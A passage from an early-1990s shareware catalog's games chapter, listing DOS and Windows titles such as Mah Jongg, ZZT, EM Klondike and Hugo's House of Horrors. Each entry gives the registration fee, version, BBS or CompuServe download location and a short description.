benefits: Master disks, utilities, additional tile sets. + Look for: MAHJNG35.ZIP on BBSs (call 508-875-3618 to download it + at no charge); MAHJ35.ZIP in GAMERS forum LIB 13 on CompuServe. + Download size: 146k + Description: + A highly addictive solitaire game played with colorful Chinese + tiles. The challenge is to remove all the tiles from the + playing surface. It sounds easy to play (and it is), but + + Chapter 17, "Games" 392 + + + + winning is always a challenge. The game supports EGA, VGA and + Hercules graphics, mouse or keyboard input. Now also supports + loadable tile sets (one extra set included) as well as an + editor with which players can create their own tiles. + + 17.4.2 Other + + Product: OutFox + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 2.1 (10-19-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: OUTFOX.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 66k + Description: + Try to "Out Fox" the fox in this computerized version of "Fox + and Hounds". Keep the fox at bay so he can't reach safety. The + object is to surround the fox so it can't move. The fences, + trees, hedges, and rocks will help. Look out for the rocks + though. When the fox feels cornered or gets confused, they + move and sometimes plop down on a hound. + + Product: Pallanda + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $15.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.6 (01-27-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: PALLANDA.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 124k + Description: + This is a game for the "little people", styled somewhat like + Candy Land with surprise drawings along the way. You must get + to the center by moving to the closest matching color. There's + enough strategy and luck to make it fun for Dad and Mom. Prince + Pallanda can be included as one of the four players. The name + comes from 'Pal Land' where everyone plays happily together and + King Pallanda ensures everyone plays fair. Even youngsters + that aren't reading yet can learn to play well. + + Chapter 17, "Games" 393 + + + + Product: TriAxis + Needs: IBM PC, DOS 3.3 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 2.1 (01-10-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: TRIAXIS.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 84k + Description: + You are on an island composed of hexagonal bio-zones with + different terrain. Survival in TriAxis depends on how well you + use the environment and control your population. This + challenging game is for two to six players and the computer can + also play. Game play is a cross between chinese checkers and + regular checkers except smaller populations cannot capture + larger ones. "Harvest" and "Famine" add Mother Nature's whims. + + + 17.5 Arcade games + + Product: AxTrons + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.0 (02-17-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: AXTRONS.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 58k + Description: + Eliminate your opponents by setting traps and direct combat + based on your energy level. Try to collect as many of the + power coins thrown by the crowd at the arena as you can. The + ClyAxistrons are good trackers, so stay out of their way - if + you can. There's an extra prize for registered players with + really high scores. + + Chapter 17, "Games" 394 + + + + Product: CleanUp + Needs: IBM PC, DOS 3.3 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 2.1 (11-02-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: CLEANUP.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 65k + Description: + Clean up the gold stars without hitting a barrier or your own + trail. It takes strategy and skill to avoid blocking your own + path. If you've been a Tandy TRS-80 user, you may recognize + "NIM" at the end of each game. Keeps track of the top ten game + scores and will monitor play time so two players can compete. + Scores are based on how fast and efficiently you can "drive the + little car". The author will send you a free game disk if you + can beat the score mentioned in the DOC file. + + Product: Dueling Dragons + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.0 (02-02-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: DRAGONS.TXT on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 60k + Description: + Wrap your dragon around the opposing dragon so it can't move + long enough to be declared the winner. You also have to avoid + getting wrapped up in your own tail. You can compete with a + friend or the computer. Scoring is based on how fast you can + pin your opponent and how many moves you can make during the + pin. The key will let you speed up or slow down the + action. + + Chapter 17, "Games" 395 + + + + Product: Gopher's Garden + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.1 (06-17-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: GARDEN.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 59k + Description: + There's trouble in the garden! You are in the midst of a + gopher invasion and they're tearing up the place. You must + find the pesky critters and get rid of them before they eat all + of your flowers. It isn't easy because you can't actually see + them. All you see is the flowers disappearing and an + occasional mound of dirt. While trying to catch them be + careful to avoid crushing your own flowers. Mouse support is + provided as an automatic option. + + Product: HowTwo + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 2.1 (02-05-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: HOWTWO.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 66k + Description: + A build-it game. You must collect all of the robot part boxes + in the 10-story building and take them to the laboratory for + assembly. Watch your battery supply. If you don't have enough + power to run the elevator and lifts, you can get stranded. The + elevator and lifts sometimes need repairing so they work + reliably. Look out for the berserk Stock Clerk Robot. It + takes boxes to its attic stockroom and raids the batteries. + + Product: HUGO II, WHODUNIT? + 3-D EGA Graphics adventure game. See full description on + page 410. + + Product: HUGO'S HOUSE OF HORRORS + EGA 3-D Graphics Adventure Game. See full description on + page 410. + + Chapter 17, "Games" 396 + + + + Product: MaxMan + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest version, free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.2 (05-28-90) + User benefits: Latest version, free updates for 6 Months, & 24 Hr + Tech Support. + Look for: MAXMAN.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 44k + Description: + Similar to PAC-MAN, but with innovative additions that make + this arcade game even more enjoyable. In MaxMan, you start out + as a skinny guy. When you get one of the magic apples, you + gain sufficient energy to change shape and destroy green + gremlins for a while. You lose strength for each step you + take. If one of the gremlins gets you, your ghost may turn + into what I call a Grim Reaper. + + Product: Shooting Gallery + Needs: IBM PC, DOS 2.1 or better. VGA monitor; mouse. + Author: Arcanum Computing + Registration: $15.00 + Registration benefits: Master disks. + Version: 2.3 (12-16-91) + User benefits: Master disks. + Look for: SHOOTG23.ZIP on BBSs (call 508-875-3618 to download it + at no charge); SHOT23.ZIP in GAMERS forum LIB 7 on CompuServe. + Download size: 118k + Description: + An action/arcade game which uses 256 color MCGA graphics mode. + Seven rounds of play are included, with different targets and + objectives on each round. Includes practice mode, high score + hall of fame, extensive statistics, etc. + + Product: Spider Web + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.4 (03-04-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: SPIDER.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 63k + Description: + A crazy exercise, with a mouse or joystick, in which you must + spin a web to catch all of the flies before they over-populate. + The most effective web, although you can make it anyway you + want, looks like the ones a real garden spider spins. The best + + Chapter 17, "Games" 397 + + + + scores are achieved by keeping the number of flies trimmed to a + small number and playing for as long as possible. Webs can + also be spun with just the cursor keys. + + Product: Spin Wall + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.6 (05-28-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: SPINWALL.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 56k + Description: + In this colorful maze game, you are a ghost who can walk + through walls matching the colors of the magic keys you can + collect. At first, all of the walls are solid. Pressing the + "SPIN" key makes the corners of the walls spin at random, to + open different doorways. Each spin costs one of the gems you + must collect. Bumping solid walls or knocking over paint cans + costs extra points. The object is to maneuver through the + maze, collect keys and gems, and get to the winners circle in + the fewest steps. + + Product: SuperFly + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: Arcanum Computing + Registration: $15.00 + Registration benefits: Master disks, set of hints. + Version: 1.1 (10-29-90) + User benefits: Master disks, set of hints. + Look for: SFLY11.ZIP on BBSs (call 508-875-3618 to download it at + no charge); SFLY11.ZIP in GAMERS forum LIB 7 on CompuServe. + Download size: 79k + Description: + An all new action game by Nels Anderson, author of Mah Jongg, + EGATrek, etc. Uses hi-res graphics mode and requires an EGA or + VGA card to play. Chase the flies and other insect invaders + through 20 different rounds. Includes 3 levels of difficulty, + shell to DOS, high score hall of fame, etc. Use mouse, + joystick or keyboard to play. + + Chapter 17, "Games" 398 + + + + Product: TiltMaze + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.1 (10-01-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: TILTMAZE.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 66k + Description: + Get as many balls into the center as you can. It's not easy, + when you "tilt" the maze with the cursor keys, all of the balls + start rolling in the same direction. The bigger the tilt the + faster they roll. Oh! You also have to keep the balls from + getting zapped by one of the electric grids. If you have an + ASCII text editor, you can redesign the maze. + + Product: Volcano Hunter + Save the city from the Volcano Druts. See full description on + page 411. + + Product: Vortex + Needs: IBM PC, DOS 3.0 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.2 (04-06-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: VORTEX.ZIP on BBSs (call 619-440-0899 to download it at + no charge). + Download size: 72k + Description: + How tornadoes pick up and drop things inspired Vortex. The + idea is to trap as many of the tornadoes as possible. Each + tornado picks up and drops blocks at random and can set others + free. They can only carry one at a time but you can pick up + three. The color density of the cursor increases each time you + pick up a block. If you have one or more blocks and are not + moving you are safe. Otherwise, if a tornado catches you, it + will pick YOU up and the game ends. + + Chapter 17, "Games" 399 + + + + Product: ZZT Arcade-Adventure Game + Needs: IBM PC, DOS 2.0 or better. + Author: Potomac Computer Systems + Registration: $14.95 + Registration benefits: Bonus 'Caves of ZZT' world + Game hints + + ZZT Newsletter. + Version: 3.0 (06-10-91) + User benefits: Bonus 'Caves of ZZT' world + Game hints + ZZT + Newsletter. + Look for: EXEC PC on BBSs; ZZT30.ZIP in IBMNEW forum LIB 6 on + CompuServe; ZZT.ZIP in GAMES RT RTC LIB 6 on GEnie. + Download size: 115k + Description: + A much-improved version of the 1991 arcade-adventure game hit + that took the gaming world by storm! Over 10,000 players have + battled the tantalizing monsters and pondered the synthetic + puzzles occupying the 36 rooms in Town of ZZT. + + Tests your brain power as well as your reflexes and is very + entertaining for novices and pros alike. Includes a full game + editor so you can create your own complete ZZT worlds. + st + A Four-part epic series. Shareware version contains the 1 + world & ZZT editor. + + + 17.6 Card games + + Product: BlackJack! + Blackjack simulation / tutor. See full description on + page 404. + + Product: BridgePal + Needs: IBM PC, DOS 2.0 or better. + Author: WR Software, 415-930-0369 + Registration: $9.95 + Registration benefits: Latest Version, bonus additional program + from WR Software. + Version: 2.02 (04-29-90) + User benefits: Latest Version, bonus additional program from WR + Software. + Look for: BPAL202.ZIP on BBSs (call 415-937-0156 to download it + at no charge). + Download size: 150k + Description: + Deals random hands and lets you bid and play any way you wish. + Help features for beginners: optional hand point count, + optional recommended bid. Two player options let you compete on + the same hands with another player. Best hand option to + increase offensive practice. Replay any hand at any time for + interesting/chalenging hands. Rotate hands to play from the + other teams perspective. + + Chapter 17, "Games" 400 + + + + Product: Hearts + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: CareWare, 916-477-6024 + Registration: $15.00 + Registration benefits: Phone/CompuServe/mail support. + Version: 6c (01-15-92) + User benefits: Phone/CompuServe/mail support. + Look for: availability unknown on BBSs; HEART6.ZIP in IBMNEW + forum LIB 8 on CompuServe. + Download size: 65k + Description: + Featured in COMPUTE! magazine and is acclaimed by many users to + be the best Hearts game they have experienced. You try your + luck against three computer players with control over several + users options. Offers full mouse support, ease of play and fun + for the whole family. + + Product: MEMORY [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Jimmy Paris Software, 804-295-5496 + Registration: $5.00 + Registration benefits: Unlimited support. + Version: 2.2R (04-01-91) + User benefits: Unlimited support. + Look for: MEMORY.ZIP on BBSs. + Download size: 22k + Description: + This is a computer version of the card game of Concentration. A + deck of 54 cards is lied out face down. You try to match cards. + There are 13 double pairs and one single. The default cards are + animals, but you can supply your own. Up to four people can + play. The game was written for 7 and 8 year old children and is + useful in helping them learn to read. + + Product: Mille French Card Game + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Unique Software + Registration: $19.95 + Registration benefits: Reduced rate upgrades; notification of + major upgrades; tech support by Fax and/or CompuServe Mail. + Version: 1.2 (11-15-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; tech support by Fax and/or CompuServe Mail. + Look for: MILLE12.EXE on BBSs; MILLE1.EXE in IBMNEW forum LIB 6 + on CompuServe. + Download size: 93k + Description: + A 100% CGA graphics game of the popular French card game Mille + Bournes. Complete interactive instuctions can be chosen before + the start of the game. If you're tired of card games of + "telling" you your hand, this is the game you've been looking + for! Single Player Version. + + Chapter 17, "Games" 401 + + + + 17.6.1 Poker + + Product: EM Poker Solitaire + EGA solitaire card game. See full description on page 402. + + Product: Get Lucky! + Adult oriented trivia & poker. See full description on + page 422. + + 17.6.2 Solitaire + + Product: Calculation Solitaire + Needs: IBM PC, Windows 3.0 or better. + Author: Daniel Thomas, 714-524-5625 + Registration: $17.00 + Registration benefits: Disk, printed manual. + Version: 1.12 (12-23-91) + User benefits: Disk, printed manual. + Look for: availability unknown on BBSs; CLCSOL.ZIP in WINADV + forum LIB 6 on CompuServe. + Download size: 71k + Description: + A solitaire card game for Windows 3.0. Skill plays an important + part in this game. Features: Card-Dragging, Skill Levels, Top + Scores, Undo, On-Screen Hints, Changing Card Backs, and more. + + Product: Canfield For Windows + Needs: IBM PC, Windows 3.0 or better. + Author: Daniel Thomas, 714-524-5625 + Registration: $17.00 + Registration benefits: Disk, printed manual. + Version: 1.01 (01-04-92) + User benefits: Disk, printed manual. + Look for: availability unknown on BBSs; CANFLD.ZIP in WINADV + forum LIB 6 on CompuServe. + Download size: 103k + Description: + From the author of ZiPaper and Calculation Solitaire comes a + new Windows solitaire card game. One beta tester said: "You + have the best computer card program that I've ever tried." Give + it a try and decide for yourself. Tons of bells and whistles, + including the ability to cheat! + + Chapter 17, "Games" 402 + + + + Product: EM Klondike + Needs: IBM PC, DOS 2.1 or better. EGA monitor, 384K RAM. + Author: EM Software + Registration: $15.00 + Registration benefits: Printed manual and latest version on disk. + Version: 3.01 (05-01-91) + User benefits: Printed manual and latest version on disk. + Look for: KLONDK30.ZIP on BBSs (call 209-683-2084 to download it + at no charge); KLDK30.EXE in IBMJR forum LIB 8 on CompuServe; + KLONDK30.EXE in IBMPC RTC LIB 7 on GEnie. + Download size: 125k + Description: + Outstanding implementation of the classic solitaire game. Great + EGA graphics, sound, three variations, mouse support, Top Ten + lists. "You can look at a lot of shareware card ganes, but I + doubt you'll find one that tops EM Klondike in any respect." - + Dr. File Finder's Guide to Shareware, Osborne-McGraw Hill, + 1990. "Klondike from EM Software shows a level of + professionalism in design and implementation that surpasses + much commercial software." - Barry Brenesal, PC Sources, May + 1991. + + Product: EM Poker Solitaire + Needs: IBM PC, DOS 2.1 or better. EGA monitor, 384K RAM. + Author: EM Software + Registration: $15.00 + Registration benefits: Latest version on disk, printed manual. + Version: 2.0 (05-30-91) + User benefits: Latest version on disk, printed manual. + Look for: PKRSOL20.ZIP on BBSs (call 209-683-2084 to download it + at no charge); PSOL20.EXE in IBMNEW forum LIB 8 on CompuServe; + PKRSOL20.EXE in IBMPC RTC LIB 7 on GEnie. + Download size: 120k + Description: + Great solitaire card game. Place cards one by one on a 5x5 + grid; score each row and column as a Poker hand. Excellent EGA + graphics, music, mouse support, three variations, two scoring + systems, Top Ten lists, the works! From the same author of EM + Klondike and EM Pyramid. If you like solitaire card games, give + this one a try! "Poker Solitaire has me hooked - just as your + Klondike did!" - Ed Rochelle, Dix Hills, NY. + + Chapter 17, "Games" 403 + + + + Product: EM Pyramid + Needs: IBM PC, DOS 2.1 or better. EGA monitor, 384K RAM. + Author: EM Software + Registration: $15.00 + Registration benefits: Latest version on disk and printed manual. + Version: 1.07 (05-30-91) + User benefits: Latest version on disk and printed manual. + Look for: PYRMID10.ZIP on BBSs (call 209-683-2084 to download it + at no charge); PYRD10.EXE in IBMNEW forum LIB 8 on CompuServe; + PYRMID10.EXE in IBMPC RTC LIB 7 on GEnie. + Download size: 130k + Description: + Great EGA solitaire card game. Clear the pyramid by removing + pairs of cards that total thirteen. Outstanding EGA graphics, + music, mouse support, Top Ten lists. Tournament play against + another play or the computer. From the same author of EM + Klondike. "I thought it would be impossible to outdo Klondike!" + - David Hardy, San Francisco, CA. "One of the most fascinating + games for the computer." - Robert Van Dyke, Lancaster, OH. + + Product: PATIENCE 10 + Needs: IBM PC, DOS 2.1 or better. + Author: CoCoWare - Cowles Company Software, 817-249-0821 + Registration: $10.00 + Registration benefits: Printed documentation; upgrade notices; + mail support. + Version: 3.31 (06-11-91) + User benefits: Printed documentation; upgrade notices; mail + support. + Look for: availability unknown on BBSs. + Download size: 200k + Description: + A collection of 10 popular solitaire games all run from a + single menu. The games include Accordion, Canfield, Dimaryp, + Eliminate, Golf, Klondike, Nestor, Pyramid, Stacker, and Vegas. + Each game features its own best scores table. Best scores are + determined using everything from cards remaining and mistakes + made to the time it took to play. Documentation covers rules + and strategies for all ten games. Customer color setup is + provided and a mouse is fully supported. Addictive! + + Chapter 17, "Games" 404 + + + + 17.7 Non-card games + + Product: BRAINdead2 + Needs: IBM PC, DOS 2.1 or better. EGA monitor (must have 640x350 + resolution capability). + Author: Michael Donat, 501-442-0301 + Registration: $10.00 + Registration benefits: Include an extra $5 for latest version on + disk. + Version: 1.00 (09-04-91) + User benefits: Include an extra $5 for latest version on disk. + Look for: BD2.ZIP on BBSs. + Download size: 51k + Description: + Features two distinct games in a single program - a hidden tile + match game that tests memory skills and a visible tile match + game that pits the player against the clock. Tile contents may + be set to numbers, letters or colors for matching. Mouse or + keyboard control is provided. + + The game was originally written because there are so few PC + games that our five year old could play without help. Kids do + really well! As for adults - the name says it all. + + + 17.8 Casino games + + Product: BlackJack! + Needs: IBM PC, DOS 2.0 or better. EGA or Hercules monitor. + Author: Glencoe Computing, 314-458-2863 (EVE) + Registration: $29.99 + Registration benefits: Latest version, full support, optional + printed docs ($5 surcharge). + Version: 2.21p (06-05-91) + User benefits: Latest version, full support, optional printed + docs ($5 surcharge). + Look for: BJ-221.EXE on BBSs; BJ221.EXE in IBMNEW forum LIB 8 on + CompuServe. + Download size: 150k + Description: + An accurate simulation of the game Blackjack as played in + American and foreign casinos. Splitting, doubling-down, + insurance and surrender are all supported depending on "house + rules". The thorough documentation, sophisticated practice + drills and extensive statistics help the user reach any level + of expertise. The finest, most fun way to learn Blackjack. The + comments of hundreds of registered users can be summed up in 5 + words - "The Best I've Ever Seen!". Super high quality + graphics + + Chapter 17, "Games" 405 + + + + 17.9 War games + + Product: RoDrones + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 1.2 (02-04-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: RODRONE.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 60k + Description: + This is a challenging game in which you must think in three- + dimensions to succeed. You must position your Robot Drones + close enough to the intruders in your space sector to destroy + them when they are "fired". After positioning, the RoDrones + will report their distance to any intruders. For advanced + play, the game will print a graph you can use with a compass to + help calculate the intruder positions. + + + 17.10 Simulators + + Product: 3 ball Juggler + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: First Magnitude, 513-436-0232 + Registration: $15.00 + Registration benefits: Disk with latest version, additional + illustrated material, discount on 5 ball version, phone + support. + Version: 1.13 (12-08-91) + User benefits: Disk with latest version, additional illustrated + material, discount on 5 ball version, phone support. + Look for: availability unknown on BBSs; JUGLE3.ZIP in GAMERS + forum LIB 4 on CompuServe. + Download size: 100k + Description: + Program uses high resoultion animated graphics to teach three + ball juggling. Complete lessons are provided from introduction + through several tricks. A game section is included that + simulates juggling with arcade-game like action. Three levels + of play are provided. The easy level can be mastered in + minutes. The hard level involves performing "tricks" and is + very challenging. + + Product: The LOTTO SIMULATOR + See how your picks stand up against the odds. See full + description on page 368. + + Chapter 17, "Games" 406 + + + + Product: MAZE3 + Needs: IBM PC, DOS 2.1 or better. + Author: Stiller Research, 904-575-7884 + Registration: $12.00 + Registration benefits: Master disks. + Version: 3.0.6 (01-19-89) + User benefits: Master disks. + Look for: availability unknown on BBSs; MAZ3.EXE in IBMNEW forum + LIB 6 on CompuServe. + Download size: 64k + Description: + Allows you to create a unigue maze of any size and then explore + it. You see realistic 3D views of the interior of the maze. + Maze provides advanced pallete switching graphics for EGA/VGA + adpaters but Maze will even work on non-graphics adapters in a + special character graphics mode. You explore the maze using a + compass and dropping markers to find your way. You may print a + complete map of the maze when you quit or find your way out of + the maze. + + Product: PC-HAM + HAM logging, contest and SS game simulation. See full + description on page 370. + + 17.10.1 Sports + + Product: Bass Class + Needs: IBM PC, DOS 1.0 or better. 512k RAM; EGA monitor. + Author: Olsen Outdoors, 508-486-3042 + Registration: $15.00 + Registration benefits: Newest version sent. Unlimited CIS/phone/ + mail and BBS support. + Version: 1.2 (03-22-91) + User benefits: Newest version sent. Unlimited CIS/phone/mail and + BBS support. + Look for: BASSCL12.ZIP on BBSs (call 508-875-3618 to download it + at no charge); BASSCL.ZIP in GAMERS forum LIB 6 on CompuServe. + Download size: 176k + Description: + A fishing game and a whole lot more. Lots of on-screen help + with your fishing. There's even an on-screen glossary of + fishing terms. It has a great user interface. Comes with six + new lakes to fish that are BassTour compatible. Other lakes are + available from the author. With this game you can actually + learn how to fish for bass while having fun while you play. If + you're already a fishing fanatic, you can use it to hone your + skills! Full mouse support too. + + Chapter 17, "Games" 407 + + + + Product: BassTour + Needs: IBM PC, DOS 2.0 or better. 512k RAM; CGA or Hercules + monitor. + Author: Olsen Outdoors, 508-486-3042 + Registration: $15.00 + Registration benefits: Newest version sent. Unlimited phone, CIS, + mail, and BBS support. + Version: 4.5 (03-26-91) + User benefits: Newest version sent. Unlimited phone, CIS, mail, + and BBS support. + Look for: BASSTR45.ZIP on BBSs (call 508-875-3618 to download it + at no charge); BASSTR.ZIP in GAMERS forum LIB 6 on CompuServe. + Download size: 158k + Description: + The ULTIMATE fishing game. You'll fish a three day tournament + against 30 of the top names in bass fishing. You'll do it in a + fully rigged bass boat. You've got six different fishing rods + and over 2300 lure/color combinations. The boat has a trolling + motor, a powerful outboard motor, various emergency and safety + devices and even an on-screen LCD fish finder. Comes with six + different lakes to fish (others are available from the author) + and provides mouse support. + + Product: FIELD GENERAL [***] + Needs: IBM PC, DOS 3.3 or better. 580k RAM, hard disk, CGA + monitor. + Author: rbm software, 512-388-0830 + Registration: $24.98 + Registration benefits: Master disks, unlimited mail support. + Version: 5.1 (01-15-92) + User benefits: Master disks, unlimited mail support. + Look for: FTBALL51.EXE (multiple files) on BBSs (call + 512-837-0953 to download it at no charge). + Download size: 420k + Description: + 61 offensive & 17 defensive plays producing over 37,000 + possible results, auto. or manual play, real-time game clock & + play clock, 2-pt. conversions, weather elements, turnovers, + penalties, angle punts, fake punts & field goals, onside & + squib kicks, blocked kicks, QB traps, time outs, no-huddle + offense simulation, instant replay feature, American/ + International rules, EXTENSIVE set of game stats & records, + All-Time Game Records, Ground Ball play, Tendency Tracking + System, and much, MUCH more! + + Chapter 17, "Games" 408 + + + + 17.11 Star Trek & Star Wars + + Product: EGATrek + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Author: Arcanum Computing + Registration: $15.00 + Registration benefits: Master disks. + Version: 3.0 (01-22-92) + User benefits: Master disks. + Look for: EGATRK30.ZIP on BBSs (call 508-875-3618 to download it + at no charge); EGAT30.ZIP in GAMERS forum LIB 7 on CompuServe. + Download size: 116k + Description: + A colorful, hi-res version of the classic computer game. The + player is put in control of a powerful starship in a battle to + save the universe. The computer screen simulates the captain's + command console with scanners, messages, damage control and + even a view outside the ship. Score is based on the time needed + to complete the mission with bonuses for rescues, ships + destroyed, etc. Supports only EGA graphics. + + Product: STARTREK the Computer Program + Needs: IBM PC, DOS 2.0 or better. + Author: Software for Amateur Radio, 301-593 6136 + Registration: $15.00 + Registration benefits: support, and free updates. + Version: 1.00 (05-25-90) + User benefits: support, and free updates. + Look for: TREKBOOK on BBSs (call 301-593 9067 to download it at + no charge). + Download size: 200k + Description: + The techniques used in writing a good game are the same that + programmers use in professional activities. Writing a good game + poses a challenge that allows you to develop good habits and + techniques for programming and also allows you to learn a + language in an interesting manner. + + This product teaches the techniques for writing such a game + using the STARTREK game as an example, and BASIC as the + programming language in which to write the code. + + Chapter 17, "Games" 409 + + + + Product: Super StarTrek + Needs: IBM PC, DOS 3.3 or better. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 5.5 (01-12-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: SUPRTREK.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 102k + Description: + A strategy game that's similar to the public domain version of + "STARTREK" but with sophisticated differences. If you like + Star Trek, you'll really like this one! Don't forget to set + your shields right after signing on as Captain of the + Enterprise. The Klingons won't wait to fire. You'll hear + lot's of sound while you control the fate of the Enterprise in + your sector of the Galaxy. You are given a fixed amount of + time to explore, find, and destroy all of the Klingon ships. + + + 17.12 Trivia + + Product: Computer Trivia Quiz + A learning game to enhance Computer Literacy. See full + description on page 316. + + Product: Get Lucky! + Adult oriented trivia & poker. See full description on + page 422. + + Product: I.Q. Challenge + Needs: IBM PC, DOS 2.1 or better. + Author: R.K. West Consulting + Registration: $15.00 + Registration benefits: Free mail support, 900-number phone + support, printed manual, new game, upgrade notices. + Version: 1.23 (03-01-92) + User benefits: Free mail support, 900-number phone support, + printed manual, new game, upgrade notices. + Look for: IQ.ZIP on BBSs; IQ.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 1k + Description: + Compete against yourself or others in 5 categories of + knowledge. Your choice of 3 levels of play determines speed and + points earned. Each player can print a certificate of + achievement and could be listed as a Genuine Genius! + + Chapter 17, "Games" 410 + + + + Product: the last word + Needs: IBM PC, DOS 2.1 or better. + Author: Bit Masons Consulting, 508-898-3321 + Registration: $15.00 + Registration benefits: Minimum 90 days phone/BBS/mail support. + Disk with additional questions and registration number to + eliminate reminder screen. Coupon for discount on other author + products. + Version: 1.00 (11-25-90) + User benefits: Minimum 90 days phone/BBS/mail support. Disk with + additional questions and registration number to eliminate + reminder screen. Coupon for discount on other author products. + Look for: LWORD100.ZIP on BBSs; LW100.ZIP in GAMERS forum LIB 13 + on CompuServe. + Download size: 150k + Description: + A quotations trivia game in which 1 to 4 players compete + against each other and their own high scores in identifying the + source of quotations and completing partial quotes. Most + answers are entered free-form and are matched against a set of + acceptable responses by a sophisticated pattern-recognition + algorithm and, thus, the program is very forgiving when it + comes to misspelled or abbreviated answers. The user can + customize settings such as typing time for each player. + + + 17.13 Adventure + + Product: HUGO II, WHODUNIT? + Needs: IBM PC, DOS 3.0 or better. EGA monitor; 1MB of disk + space. + Author: Gray Design Associates + Registration: $20.00 + Registration benefits: Hint booklet, Playback mode, HUGO'S HOUSE + OF HORRORS. + Version: 1.1 (06-02-91) + User benefits: Hint booklet, Playback mode, HUGO'S HOUSE OF + HORRORS. + Look for: availability unknown on BBSs; HUGO2.EXE in IBMNEW forum + LIB 3 on CompuServe. + Download size: 330k + Description: + It's adventure time again as Hugo and Penelope get swept up in + another superbly animated 3D adventure. This time a murder + mystery is afoot with a couple of fiendish twists and a large + helping of humor. Just look what's in store - a revolving + bookcase, a saucy French maid and a murderer! Over 50% bigger + than the original Hugo's House of Horrors! If you enjoyed Hugo + 1 you'll love the sequel. + + Chapter 17, "Games" 411 + + + + Product: HUGO'S HOUSE OF HORRORS + Needs: IBM PC, DOS 3.0 or better. EGA monitor; 1MB of disk + space. + Author: Gray Design Associates + Registration: $20.00 + Registration benefits: Hint booklet, playback mode, 